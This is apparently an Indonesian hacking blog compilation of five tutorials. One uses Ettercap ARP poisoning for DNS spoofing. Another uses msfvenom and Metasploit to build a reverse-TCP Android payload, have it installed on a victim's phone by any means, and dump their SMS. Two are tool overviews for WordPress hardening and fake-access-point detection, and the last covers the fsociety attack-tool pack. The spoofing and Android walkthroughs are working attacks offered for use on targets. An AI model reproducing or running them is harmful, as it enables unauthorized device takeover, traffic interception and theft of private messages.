DNS Spoofing with Ettercap on Kali Linux


Kita akan melakukan DNS Spoofing menggunakan Tool Ettercap.

Langkah-langkah

1. Buat terlebih dahulu file index.html (file ini yang akan muncul pada output spoofing pada target). Pindahkan juga pada direktori /var/www/html. untuk direktori sesuaikan dengan web server yang dipakai. (saya memakai apache sebagai web server)

2. Edit konfigurasi file ettercap.dns di direktori /etc/ettercap.

Perhatikan dengan baik konfigurasi ini


3. Kita buka Ettercap dengan perintah " Ettercap -G ".

4. Apabila sudah terbuka teken kombinasi tombol ctrl+u, lalu sesuaikan interface yang terhubung ke host.


5. Untuk melihat daftar host tekan kombinasi tombol ctrl+h, untuk melakukan scan ctrl+s.

6. Tambahkan ip dari target ke daftar target 1.


7. Masuk ke tab MITM > pilih ARP Poisoning dan centang Sniff remote connections.


8. Buka daftar plugins Ettercap. Tab Plugins > Manage The Plugins, lalu aktifkan dns spoofing.


9. silahkan cek di komputer target sesuai ip target yang telah diset tadi. coba cek di browser target tulis dns suatu web. contohnya : youtube.com.


Sukses. Selamat mencoba dan semoga berhasil.

Controll Android with Metasploit


Langsung saja

Requiretments


  • Tool Metasploit
  • One Network (berada dalam 1 jaringan)

Langkah-langkah

1. Pertama buat Payload terlebih dahulu (software ini akan menjadi sebagai jembatan penghubung victim dengan metasploit)
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.164 LPORT=4444 > android.apk


Untuk ip Lhost sesuaikan dengan ip masing-masing.


Sampai disini Payload telah jadi saatnya kalian membagikan kepada target kalian, entah bagaimana cara kalian intinya payload tersebut harus berhasil terinstall dan terbuka di android target.





2. Selanjutnya kita buka Metasploit
# msfconsole


3. Lalu lakukan konfigurasi seperti dibawah ini :
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.164
msf exploit(multi/handler) > set LPORT 4444


4. Lalu cek apakah sudah ter pasang semua konfigurasi diatas
msf exploit(multi/handler) > show options


5. Kita Jalankan exploit kita
msf exploit(multi/handler) > exploit


6. Untuk mengetahui command yang dipakai gunakan perintah help


7. Kita coba import seluruh sms yang ada dalam target
meterpreter > dump_sms


output file berada di folder home atau root


8. Untuk yang lainnya silahkan explore sendiri :D

Semoga sukses dan berhasil

Seluruh kejadian yang terjadi bukan menjadi tanggung jawab saya
Gunakan dengan bijak serta untuk suatu hal yang positif
Apabila ada pertanyaan silahkan contact atau komentar dibawah

WPHardening v1.6 - Perkuat Security Wordpress


Tool ini merilis versi baru secara teratur. Pastikan untuk memperbarui dependensi Anda untuk mendapatkan versi terbaru. Simak changelog atau CHANGELOG.md untuk mempelajari fitur baru.

Installation


Download here

# pip install -r requirements.txt

Penggunaan


Check a WordPress Project
# python wphardening.py -d /home/path/to/wordpress -v

Change permissions
# python wphardening.py -d /home/path/to/wordpress --chmod -v

Remove files that are not used
# python wphardening.py -d /home/path/to/wordpress --remove -v

Create your robots.txt file
# python wphardening.py -d /home/path/to/wordpress --robots -v

Remove all fingerprinting and Version
# python wphardening.py -d /home/path/to/wordpress --fingerprinting -v

Check a TimThumb library
# python wphardening.py -d /home/path/to/wordpress --timthumb -v

Create Index file
# python wphardening.py -d /home/path/to/wordpress --indexes -v

Download Plugins security

Berikut adalah daftar plugin keamanan yang paling umum digunakan yang dapat Anda download secara otomatis:

# python wphardening.py -d /home/path/to/wordpress --plugins

Wizard generated wp-config.php
# python wphardening.py -d /home/path/to/wordpress --wp-config

6G Firewalls
# python wphardening.py -d /home/path/to/wordpress --6g-firewall

Disable REST API
# python wphardening.py -d /home/path/to/wordpress --rest-api

WPHardening update
# python wphardening.py --update

Use all options
# python wphardening.py -d /home/path/to/wordpress -c -r -f -t --wp-config --indexes --plugins --6g-firewall

Project Home

www.caceriadespammers.com.ar

Referensi


https://github.com/elcodigok/wphardening
https://www.kitploit.com/2017/12/wphardening-v16-fortify-security-of-any.html

PiKarma - Deteksi Penyerang Jaringan Wireless


Mendeteksi serangan jaringan wireless yang dilakukan oleh KARMA (AP palsu). Memulai serangan deauthentication (untuk access point palsu)

Prinsip Kerja

  • Mengumpulkan semua paket dari Jaringan Nirkabel. (Respon Probe)
  • Analisis semua paket secara real time.
  • Jika PiKarma menemukan lebih dari satu info SSID dari alamat mac address dalam Probe Response
  • Log aktivitas dengan beberapa informasi tambahan dalam template didefinisikan dan mengirimkan paket deauthentication

Contoh :


Installasi


1. Download PiKarma:
# git clone https://github.com/WiPi-Hunter/PiKarma.git

2. Install Python librarie(s):
# pip install termcolor

It's done!

Metode Penggunaan


1. Aktifkan interface wireless mode monitor

Monitor mode:
# airmon-ng start interface(wlan0,wlan1)

atau
# ifconfig wlan0 down
# iwconfig wlan0 mode Monitor
# ifconfig wlan0 up

2. Jalankan

# cd PiKarma
# python PiKarma.py -h

Contoh Penggunaan



Referensi

https://www.kitploit.com/2017/12/pikarma-detects-wireless-network-attacks.html
https://github.com/WiPi-Hunter/PiKarma

Fsociety Hacking Tools Pack - Kumpulan Tools Pentetrasi Framework


Kumpulan tools yang dipack menjadi satu untuk keperluan Pentrasi testing Framework. Fsociety Berisi Semua Alat yang Digunakan Dalam Serial film mr.Robot.


Menu

  • Information Gathering
  • Password Attacks
  • Wireless Testing
  • Exploitation Tools
  • Sniffing & Spoofing
  • Web Hacking
  • Private Web Hacking
  • Post Exploitation
  • INSTALL & UPDATE

Daftar Tools


Information Gathering :
  • Nmap
  • Setoolkit
  • Port Scanning
  • Host To IP
  • wordpress user
  • CMS scanner
  • XSStracer
  • Dork - Google Dorks Passive Vulnerability Auditor
  • Scan A server's Users

Password Attacks :
  • Cupp
  • Ncrack

Wireless Testing :
  • reaver
  • pixiewps

Exploitation Tools :
  • Venom
  • sqlmap
  • Shellnoob
  • commix
  • FTP Auto Bypass
  • jboss-autopwn

Sniffing & Spoofing :
  • Setoolkit
  • SSLtrip
  • pyPISHER
  • SMTP Mailer

Web Hacking :
  • Drupal Hacking
  • Inurlbr
  • Wordpress & Joomla Scanner
  • Gravity Form Scanner
  • File Upload Checker
  • Wordpress Exploit Scanner
  • Wordpress Plugins Scanner
  • Shell and Directory Finder
  • Joomla! 1.5 - 3.4.5 remote code execution
  • Vbulletin 5.X remote code execution
  • BruteX - Automatically brute force all services running on a target
  • Arachni - Web Application Security Scanner Framework

Private Web Hacking
  • Get all websites
  • Get joomla websites
  • Get wordpress websites
  • Control Panel Finder
  • Zip Files Finder
  • Upload File Finder
  • Get server users
  • SQli Scanner
  • Ports Scan (range of ports)
  • ports Scan (common ports)
  • Get server Info
  • Bypass Cloudflare

Post Exploitation
  • Shell Checker
  • POET
  • Phishing Framework

Installation


1. Download

# git clone https://github.com/Manisso/fsociety.git
# cd fsociety && python fsociety.py

2. Install and Upate (pilih 0)

0 : INSTALL & UPDATE

3. Congratulation Fsociety is Installed !

Contoh Pemakaian :




Referensi :

https://www.kitploit.com/2017/12/fsociety-hacking-tools-pack-penetration.html
https://github.com/Manisso/fsociety